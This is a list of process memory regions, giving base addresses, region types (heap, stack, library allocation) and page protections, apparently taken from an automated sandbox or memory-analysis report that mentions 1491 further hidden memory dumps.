1B661FC0000
heap
page readonly
BACA34E000
stack
page read and write
7FFE7DD20000
trusted library allocation
page read and write
DA9177F000
stack
page read and write
1A3C9734000
heap
page read and write
1DDC13CD000
heap
page read and write
237D3930000
trusted library allocation
page read and write
E0225BC000
stack
page read and write
237EBCD0000
heap
page read and write
1E0737BC000
heap
page read and write
7FFE7DBD2000
trusted library allocation
page read and write
1A3E3450000
heap
page read and write
2AC61CBF000
heap
page read and write
218A3B1E000
heap
page read and write
175F1100000
heap
page read and write
284753B0000
unkown
page read and write
1A2B52A4000
heap
page read and write
160D0B9D000
heap
page read and write
F4B587E000
stack
page read and write
7FFE7DBEA000
trusted library allocation
page read and write
5A9F07F000
stack
page read and write
253C7E75000
heap
page read and write
237D1CE9000
heap
page read and write
284773C0000
unkown
page read and write
246FF680000
heap
page read and write
1DDA74E0000
heap
page read and write
1B6620CD000
heap
page read and write
1A3CCE9F000
trusted library allocation
page read and write
25DEFC8F000
heap
page read and write
20DC2C00000
heap
page read and write
1DDAAA70000
trusted library allocation
page read and write
1F7F8120000
heap
page read and write
2D1224D000
stack
page read and write
1DEE780A000
heap
page read and write
90B80FF000
stack
page read and write
672524E000
stack
page read and write
1CD270F7000
heap
page read and write
237EBE6E000
heap
page read and write
7FFE7DD80000
trusted library allocation
page read and write
237D3560000
trusted library allocation
page read and write
1DDA74D0000
heap
page read and write
20ECD76C000
heap
page read and write
2096B740000
heap
page read and write
20D3BA20000
heap
page read and write
203C0BA7000
heap
page read and write
7FFE7DCE0000
trusted library allocation
page read and write
2AC61AB0000
heap
page read and write
2AC61C9B000
heap
page read and write
2287ECCE000
heap
page read and write
7FF751979000
unkown
page write copy
281C3F50000
heap
page read and write
1B6620D0000
heap
page read and write
1CD42F17000
heap
page read and write
218A3B26000
heap
page read and write
591887F000
stack
page read and write
7FFE7DC0A000
trusted library allocation
page read and write
203C0BBE000
heap
page read and write
1DDA7370000
heap
page read and write
67AE7B3000
stack
page read and write
7FFE7DAF0000
trusted library allocation
page execute and read and write
1A2A002E000
heap
page read and write
2A03FF000
stack
page read and write
1FC3D40D000
heap
page read and write
235C63FE000
heap
page read and write
1CD25195000
heap
page read and write
7FFE7DC50000
trusted library allocation
page read and write
7FFE7DA3D000
trusted library allocation
page execute and read and write
2FCBFFE000
stack
page read and write
4CCCE7F000
stack
page read and write
20DC2CEB000
heap
page read and write
2295C400000
heap
page read and write
1DDC15BF000
heap
page read and write
22FA362D000
heap
page read and write
1A3CAE03000
trusted library allocation
page read and write
7FFE7DC90000
trusted library allocation
page read and write
867EB6C000
stack
page read and write
218A3B30000
heap
page read and write
1E073730000
heap
page read and write
7FF75C308000
unkown
page readonly
1F0AF580000
heap
page read and write
203C0BCC000
heap
page read and write
7FF75C302000
unkown
page read and write
4CCC9AB000
stack
page read and write
23ABFFF000
stack
page read and write
90B817E000
stack
page read and write
1B663D71000
trusted library allocation
page read and write
1B662084000
heap
page read and write
7FFE7DB0C000
trusted library allocation
page execute and read and write
7FFE7DCD0000
trusted library allocation
page read and write
1FC3D4E0000
heap
page read and write
28D5A7E000
stack
page read and write
7FF7332FD000
unkown
page readonly
7FF6C5748000
unkown
page readonly
54D06FD000
stack
page read and write
7FFE7DCA0000
trusted library allocation
page read and write
7FFE7DD30000
trusted library allocation
page read and write
1F0AF5BA000
heap
page read and write
54490FF000
stack
page read and write
253C805E000
heap
page read and write
727FEFF000
stack
page read and write
237E3C81000
trusted library allocation
page read and write
2287ECCE000
heap
page read and write
1DDA93B2000
trusted library allocation
page read and write
1B6666A3000
heap
page read and write
7FFE7DBF0000
trusted library allocation
page read and write
1BA54B50000
heap
page read and write
B69437F000
stack
page read and write
2295C62E000
heap
page read and write
1B664128000
heap
page read and write
9296F2A000
stack
page read and write
1B664124000
heap
page read and write
67AEB7E000
stack
page read and write
1CD25109000
heap
page read and write
1DDC15D9000
heap
page read and write
672508E000
stack
page read and write
54D03FF000
stack
page read and write
2A01FF000
stack
page read and write
1E073770000
heap
page read and write
235C63DC000
heap
page read and write
7FFE7DC40000
trusted library allocation
page execute and read and write
2287ECC2000
heap
page read and write
235C63E9000
heap
page read and write
25DEFC65000
heap
page read and write
218A3B0C000
heap
page read and write
7FFE7DD10000
trusted library allocation
page read and write
1DDAA4DD000
trusted library allocation
page read and write
1CD25112000
heap
page read and write
1A2B52A0000
heap
page read and write
28477250000
unkown
page read and write
1F0AF5A6000
heap
page read and write
1A3CAE00000
trusted library allocation
page read and write
1A29FE86000
heap
page read and write
1A3DB3A0000
trusted library allocation
page read and write
1CD251A0000
heap
page read and write
193BE10B000
heap
page read and write
2295C4FC000
heap
page read and write
237D53AC000
trusted library allocation
page read and write
1FC3D3E7000
heap
page read and write
1DDA73A8000
heap
page read and write
1B663FE3000
heap
page read and write
54D01FF000
stack
page read and write
7FF703422000
unkown
page read and write
235C63D6000
heap
page read and write
15542BA7000
heap
page read and write
7FFE7DDB0000
trusted library allocation
page read and write
1B665EA0000
heap
page read and write
1CD25195000
heap
page read and write
B693FAE000
stack
page read and write
7FF7332F8000
unkown
page readonly
2295C480000
heap
page read and write
1B662029000
heap
page read and write
29122A97000
heap
page read and write
1A3CC918000
trusted library allocation
page read and write
There are 1491 hidden memdumps, click here to show them.